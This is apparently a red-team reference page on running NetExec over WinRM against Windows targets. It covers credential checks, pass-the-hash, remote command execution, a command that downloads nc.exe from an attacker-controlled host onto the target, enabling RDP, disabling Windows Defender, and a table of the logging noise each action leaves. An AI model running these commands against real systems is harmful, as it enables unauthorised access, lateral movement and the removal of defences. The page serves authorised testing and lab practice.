WinRM Operations with NetExec
#Overview
WinRM (Windows Remote Management, ports 5985/TCP HTTP and 5986/TCP HTTPS) is Microsoft's implementation of WS-Management. It provides PowerShell remoting capabilities. NetExec's WinRM module validates credentials and executes commands — crucially, it does not require local administrator privileges (unlike SMB -x which creates services).
WinRM is the preferred protocol for non-admin command execution on Windows targets.
#Prerequisites
- WinRM enabled on target (default on Server 2012+, often disabled on workstations)
- Valid credentials (local or domain)
- Network access to 5985/TCP (HTTP) or 5986/TCP (HTTPS)
#Credential Validation
# Validate credentials via WinRM
netexec winrm 10.10.10.5 -u user -p pass
# [+] → valid credentials with WinRM access
# [-] → invalid credentials or WinRM not enabled
# Domain context
netexec winrm 10.10.10.5 -u user -p pass -d domain.local
# Pass-the-hash
netexec winrm 10.10.10.5 -u user -H ':NTHASH'
# Local auth
netexec winrm 10.10.10.5 -u administrator -p pass --local-auth
# HTTPS (SSL)
netexec winrm 10.10.10.5 -u user -p pass --port 5986
BASH
#Command Execution
# Execute single command
netexec winrm 10.10.10.5 -u user -p pass -x 'whoami'
# -x -> cmd.exe command
# Execute PowerShell command
netexec winrm 10.10.10.5 -u user -p pass -X 'Get-Process | Select-Object -First 10'
# Execute on multiple targets
netexec winrm targets.txt -u user -p pass -x 'hostname && ipconfig'
# Execute with pass-the-hash
netexec winrm 10.10.10.5 -u admin -H ':NTHASH' -x 'net localgroup Administrators'
BASH
#Common Use Cases
#Check Local Admin Membership
netexec winrm 10.10.10.5 -u user -p pass -x 'net localgroup Administrators'
BASH
#Download and Execute Payload
netexec winrm 10.10.10.5 -u user -p pass -X 'Invoke-WebRequest -Uri http://10.10.14.5/nc.exe -OutFile C:\Windows\Temp\nc.exe'
BASH
#Enable RDP
netexec winrm 10.10.10.5 -u admin -p pass -X 'Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0'
BASH
#Disable Windows Defender
netexec winrm 10.10.10.5 -u admin -p pass -X 'Set-MpPreference -DisableRealtimeMonitoring $true'
BASH
#Common Pitfalls
- ⚠️ WinRM not enabled: Many organizations disable WinRM on workstations. Check SMB first to confirm credentials, then test WinRM.
- ⚠️ Remote Management Users group: Domain users are NOT in this group by default. Only local administrators and explicitly added users can use WinRM.
- ⚠️ PowerShell execution policy: If
-Xfails, the target may have a restrictive execution policy. Use-xfor cmd.exe commands instead. - ⚠️ Kerberos vs NTLM: WinRM prefers Kerberos authentication. If Kerberos fails (clock skew, no DC reachable), it falls back to NTLM. Pass-the-hash works because it uses NTLM.
- ⚠️ Firewall: WinRM ports (5985/5986) are often restricted to management subnets. You may need to pivot through a jump host.
#OPSEC Considerations
| Operation | Noise Level | Artifacts |
|---|---|---|
| Credential validation | Low | WinRM authentication event |
| Command execution (-x) | Medium | Process creation (4688), WinRM operational log |
| PowerShell execution (-X) | Medium | PowerShell operational log (4104), ScriptBlock logging |
| Multiple commands | High | Repeated process creation, potential AMSI hits |
#Post-Exploitation Value
- Non-admin command execution → situational awareness, file transfers
- PowerShell access → in-memory tooling (Mimikatz, PowerView), script execution
- RDP enablement → GUI access for detailed enumeration
- Defender manipulation → disable protections for subsequent tooling
#Cross-References
- SMB Operations — Admin-level command execution via SMB
- MSSQL Operations — Alternative non-admin execution path
- Shell Upgrade & Stabilization — Converting WinRM to interactive sessions
- Lateral Movement — Other lateral movement techniques
#Tool References
- NetExec WinRM Documentation
- evil-winrm — Interactive WinRM shell (complementary tool)